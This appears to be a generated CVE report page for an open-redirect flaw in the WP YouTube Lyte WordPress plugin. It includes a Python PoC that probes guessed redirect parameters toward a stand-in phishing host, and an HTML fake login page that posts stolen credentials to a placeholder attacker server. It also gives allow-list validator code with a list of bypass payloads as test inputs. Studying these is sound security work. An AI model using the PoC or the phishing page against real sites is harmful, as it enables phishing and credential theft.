Security Vulnerability Report
CVE-2025-66062 CVSS 3.4 LOW

Published: 2025-11-21 13:15:47
Last Modified: 2026-04-27 18:16:32

Description

URL Redirection to Untrusted Site ('Open Redirect', CWE-601) vulnerability in Frank Goossens' WP YouTube Lyte (wp-youtube-lyte) plugin for WordPress allows phishing: a victim who follows a link on the trusted site can be sent to an attacker-controlled host. This issue affects WP YouTube Lyte versions up to and including 1.7.28.

CVSS Details

CVSS Score
3.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available for this CVE in NVD. Affected range as published in the Patchstack advisory:

WP YouTube Lyte <= 1.7.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the advisory (see References) does not name the vulnerable request parameter; the parameter names used below are illustrative placeholders and must be replaced with the real one when testing an authorized target.

```python
#!/usr/bin/env python3
# CVE-2025-66062 PoC - WP YouTube Lyte (<= 1.7.28) open redirect (CWE-601)
#
# Attack vector:
#   1. An attacker crafts a URL on the trusted WordPress site carrying a
#      redirect parameter that points at a host they control.
#   2. The victim clicks the link, trusting the site's domain.
#   3. The site answers with a 3xx whose Location is the attacker's host,
#      landing the victim on a phishing page.
#
# Caveat: the advisory does not publish the vulnerable parameter name, so
# CANDIDATE_PARAMS below are guesses, not confirmed identifiers.
import sys
from urllib.parse import urlparse

import requests

TARGET_DOMAIN = "http://vulnerable-wordpress-site.com"
MALICIOUS_DOMAIN = "http://evil-phishing-site.com"

# Example malicious URLs (parameter names are placeholders):
#   http://target-site.com/?redirect=http://evil-phishing-site.com
#   http://target-site.com/wp-youtube-lyte/?lyte_redirect=http://malicious-site.com
#   http://target-site.com/?url=http://attacker-controlled-site.com&action=redirect
CANDIDATE_PARAMS = ["redirect", "lyte_redirect", "url"]

REDIRECT_CODES = {301, 302, 303, 307, 308}


def check_open_redirect(target: str, param: str, evil: str, timeout: float = 10.0) -> bool:
    """Return True if GET target/?param=evil answers with a 3xx whose Location is on evil's host."""
    crafted = f"{target}/?{param}={evil}"
    print(f"[*] Crafted URL: {crafted}")
    resp = requests.get(crafted, allow_redirects=False, timeout=timeout)
    print(f"[*] Status Code: {resp.status_code}")
    if resp.status_code not in REDIRECT_CODES:
        print("[-] No redirect detected")
        return False
    location = resp.headers.get("Location", "")
    print(f"[*] Redirect Location: {location}")
    # A 3xx alone is not proof: WordPress often redirects to its own login page.
    # Only count it when the Location actually leaves for the attacker's host.
    if urlparse(location).netloc == urlparse(evil).netloc:
        print("[!] Vulnerability Confirmed: Open Redirect is possible")
        return True
    print("[-] Redirect stays on the target (not an open redirect)")
    return False


# HTML phishing page the attacker would host on MALICIOUS_DOMAIN; the form
# posts whatever the victim types to an attacker-controlled logging server.
HTML_TEMPLATE = '''<!DOCTYPE html>
<html>
<head><title>Login Required</title></head>
<body>
<h1>Please Login to Continue</h1>
<form action="http://attacker-logging-server.com/steal">
<input type="text" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<button type="submit">Login</button>
</form>
</body>
</html>
'''

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_DOMAIN
    print(f"[*] Target: {target}")
    print(f"[*] Malicious Redirect: {MALICIOUS_DOMAIN}")
    for param in CANDIDATE_PARAMS:
        if check_open_redirect(target, param, MALICIOUS_DOMAIN):
            break
```
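The fix for CWE-601 is to refuse any redirect target the application did not explicitly allow, rather than trying to blacklist attacker hosts. The validator below is an added example written for this page; it is not code from WP YouTube Lyte, from the advisory, or from the fix the vendor shipped. It follows the allow-list shape of WordPress core's `wp_validate_redirect()` (the function behind `wp_safe_redirect()`): host allow-list, rejection of non-http(s) schemes, userinfo and scheme-without-host forms, with protocol-relative and backslash variants normalised first. The host `site.example`, the function names and the payload list are constructed for illustration; in a real plugin the equivalent is to call `wp_safe_redirect()` instead of `wp_redirect()` with a user-supplied URL.

```python
#!/usr/bin/env python3
# Added example: allow-list redirect validation (not the plugin's code).
from typing import Collection, Dict
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_safe_redirect(location: str, allowed_hosts: Collection[str]) -> bool:
    """Return True only for relative paths or absolute http(s) URLs on an allowed host.

    allowed_hosts holds lowercase hostnames; an entry "host:port" is needed to
    allow an explicit non-default port. Anything ambiguous is rejected so the
    caller falls back to a fixed safe URL.
    """
    if not location:
        return False
    # Browsers ignore tabs/newlines anywhere and whitespace at the ends; strip them
    # so the parser sees the same URL the browser will.
    loc = location.strip().replace("\t", "").replace("\r", "").replace("\n", "")
    if not loc:
        return False
    # Browsers treat backslashes as slashes in scheme/authority, so "/\evil" is "//evil".
    loc = loc.replace("\\", "/")
    # A protocol-relative URL is absolute in the browser: parse it as one.
    if loc.startswith("//"):
        loc = "http:" + loc
    try:
        parts = urlsplit(loc)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme:
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            return False  # javascript:, data:, etc.
        if not parts.netloc:
            return False  # "http:evil.example" (no host) is ambiguous across parsers
    if parts.netloc:
        if parts.username is not None or parts.password is not None:
            return False  # "http://site.example@evil.example/" really goes to evil.example
        host = parts.hostname  # lowercased, brackets stripped
        if host is None:
            return False
        key = host if port is None else f"{host}:{port}"
        return key in allowed_hosts
    # No scheme and no host: a same-origin relative path such as "/wp-admin/".
    return True


def safe_redirect_target(location: str, fallback: str, allowed_hosts: Collection[str]) -> str:
    """Return location if it passes the allow-list, else the fixed fallback."""
    return location if is_safe_redirect(location, allowed_hosts) else fallback


# Constructed payloads covering the common open-redirect bypass shapes.
SAMPLE_PAYLOADS = [
    "/wp-admin/",
    "https://site.example/page?x=1",
    "http://evil-phishing-site.com",
    "//evil-phishing-site.com/login",
    "/\\evil-phishing-site.com",
    "https://site.example@evil-phishing-site.com/",
    "javascript:alert(1)",
    "http:evil-phishing-site.com",
    "https://site.example.evil-phishing-site.com/",
    "https://site.example:8443/",
]


def classify(payloads: Collection[str], allowed_hosts: Collection[str]) -> Dict[str, bool]:
    """Map each payload to whether the validator would let it through."""
    return {p: is_safe_redirect(p, allowed_hosts) for p in payloads}


if __name__ == "__main__":
    allowed = {"site.example"}
    for payload, ok in classify(SAMPLE_PAYLOADS, allowed).items():
        print(f"{'ALLOW ' if ok else 'REJECT'}  {payload!r}")
```

Only the first two payloads are allowed; every other entry (the plain attacker URL, the protocol-relative and backslash variants, the userinfo trick, the non-http scheme, the host-less `http:` form, the look-alike subdomain and the unexpected port) is rejected and the caller redirects to its fallback instead.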

References

https://patchstack.com/database/Wordpress/Plugin/wp-youtube-lyte/vulnerability/wordpress-wp-youtube-lyte-plugin-1-7-28-open-redirection-vulnerability?_s_id=cve (Patchstack advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66062", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:47.050", "lastModified": "2026-04-27T18:16:32.137", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Frank Goossens WP YouTube Lyte wp-youtube-lyte allows Phishing.This issue affects WP YouTube Lyte: from n/a through <= 1.7.28."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-youtube-lyte/vulnerability/wordpress-wp-youtube-lyte-plugin-1-7-28-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}